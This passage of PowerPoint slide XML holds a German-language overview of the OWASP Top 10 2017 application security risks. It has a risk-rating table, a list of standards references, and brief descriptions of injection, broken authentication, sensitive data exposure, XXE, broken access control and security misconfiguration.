                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="85000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Durch-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>schnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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de-DE" sz="900" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Häufig</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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de-DE" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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lnSpc>
                          <a:spcPct val="85000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Durch-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>schnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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de-DE" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Mittel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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de-DE" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="313200">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="850" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Schwierig</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>: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18000" marR="18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50" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Selten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>: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18000" marR="18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50" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Schwierig</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>: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18000" marR="18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50" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Gering: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18000" marR="18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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId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2701753355"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4621087" y="4967778"/>
          <a:ext cx="2232000" cy="4935600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2232000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="359574">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Referenzen</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1600" b="1" noProof="0"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576026">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="13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endParaRPr lang="en-US" sz="13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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <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OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:endPar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indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <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Article on Threat/Risk Modeling</a:t>
                      </a:r>
                      <a:endPar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57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1"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Andere</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="13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ISO 31000: Risk Management </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="100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Std</a:t>
                      </a:r>
                      <a:endPar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endParaRP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ISO 27001: ISMS</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NIST Cyber Framework (US)</a:t>
                      </a:r>
                      <a:endPar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3"/>
                        </a:rPr>
                        <a:t>ASD Strategic Mitigations (AU)</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NIST CVSS 3.0</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5"/>
                        </a:rPr>
                        <a:t>Microsoft Threat Modelling Tool</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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21167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dirty="0">
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>OWASP Top 10 Risiken für die</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Anwendungssicherheit – 2017</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200BBCDD-13C0-4D97-9CEC-01B8726246D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="1141970"/>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Injection</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-Schwachstellen, wie beispielsweise SQL-, OS- oder LDAP-</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Injection</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treten auf, wenn nicht vertrauenswürdige Daten von einem Interpreter als Teil eines Kommandos oder einer Abfrage verarbeitet werden. Ein Angreifer kann Eingabedaten dann so manipulieren, dass er nicht vorgesehene Kommandos ausführen oder unautorisiert auf Daten zugreifen kann.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Freeform 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AB65A7-CD59-4B0C-BAB0-A853DD609B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="1082570"/>
            <a:ext cx="1486800"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A1:2017-Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="2011866"/>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de-DE" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anwendungsfunktionen, die im Zusammenhang mit Authentifizierung und Session-Management stehen, werden häufig fehlerhaft implementiert. Dies erlaubt es Angreifern, Passwörter oder Session-Token zu kompromittieren oder die entsprechenden Schwachstellen so auszunutzen, dass sie die Identität anderer Benutzer vorübergehend oder dauerhaft annehmen können.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56513DEF-2444-40AD-AE64-66E7CC6256D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="1952466"/>
            <a:ext cx="1486800"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36000" tIns="60192" rIns="36000"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A2:2017-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de-DE" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fehler</a:t>
            </a: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 in der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authentifizierung</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="2811600"/>
            <a:ext cx="5218177" cy="756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de-DE" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Viele Anwendungen schützen sensible Daten, wie personenbezogene Informationen und Finanz- oder Gesundheitsdaten, nicht ausreichend. Angreifer können diese Daten auslesen oder modifizieren und mit ihnen weitere Straftaten begehen (Kreditkartenbetrug, Identitätsdiebstahl etc.). Vertrauliche Daten können kompromittiert werden, wenn sie nicht durch Maßnahmen, wie Verschlüsselung gespeicherter Daten und verschlüsselte Datenübertragung, zusätzlich geschützt werden. Besondere Vorsicht ist beim Datenaustausch mit Browsern angeraten.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Freeform 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF109756-C917-4ECB-9826-AC54F0948B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="2822363"/>
            <a:ext cx="1486800"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A3:2017- </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de-DE" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verlust der Vertraulichkeit sensibler Daten</a:t>
            </a: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5" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A0868A-364E-4487-8030-7C4BD69D47DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="3729600"/>
            <a:ext cx="5218177" cy="6588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de-DE" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Viele veraltete oder schlecht konfigurierte XML Prozessoren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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berücksichtigen</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Referenzen auf externe Entitäten innerhalb von XML-Dokumenten. Dadurch können solche externen Entitäten dazu eingesetzt werden, um mittels URI Datei-Handlern interne Dateien oder File-Shares offen-zulegen oder interne Port-Scans, Remote-Code-</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Executions</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oder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Denial</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of</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-Service Angriffe auszuführen.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Freeform 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3635AA73-30CD-4FEB-BBAF-A9AD20490C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="3694295"/>
            <a:ext cx="1486800"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A4:2017-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XML External Entities (XXE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Freeform 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F57B3B-227A-4B44-B219-FB6A81F17116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490400" y="4600800"/>
            <a:ext cx="5218177" cy="6588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de-DE" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Häufig werden die Zugriffsrechte für authentifizierte Nutzer nicht korrekt um-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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bzw. </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durchgesetzt. Angreifer können entsprechende Schwachstellen ausnutzen, um auf Funktionen oder Daten zuzugreifen, für die sie keine Zugriffsberechtigung haben. Dies kann Zugriffe auf Accounts anderer Nutzer sowie auf vertrauliche Daten oder aber die Manipulation von Nutzerdaten, Zugriffsrechten etc. zur Folge haben.</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8" name="Freeform 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2374FD-7476-44F3-B906-9417B048A9A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="4564191"/>
            <a:ext cx="1486800"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36000" tIns="60192" rIns="36000"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A5:2017- </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de-DE" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fehler</a:t>
            </a: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 in der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zugriffskontrolle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490401" y="5468400"/>
            <a:ext cx="5218177" cy="6588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de-DE" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fehlkonfigurationen von Sicherheitseinstellungen sind das am häufigsten auftretende Problem. Ursachen sind unsichere Standardkonfigurationen, unvollständige oder ad-hoc durchgeführte Konfigurationen, ungeschützte Cloud-Speicher, fehlkonfigurierte HTTP-Header und Fehleraus-gaben, die vertrauliche Daten enthalten. Betriebssysteme, Frameworks, Bibliotheken und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Anwen-dungen</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müssen sicher konfiguriert werden und zeitnah Patches und Updates erhalten.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Freeform 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858E023-0889-4FE9-9B01-62527B94C07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="5434087"/>
            <a:ext cx="1486800"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36000" tIns="60192" rIns="36000" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
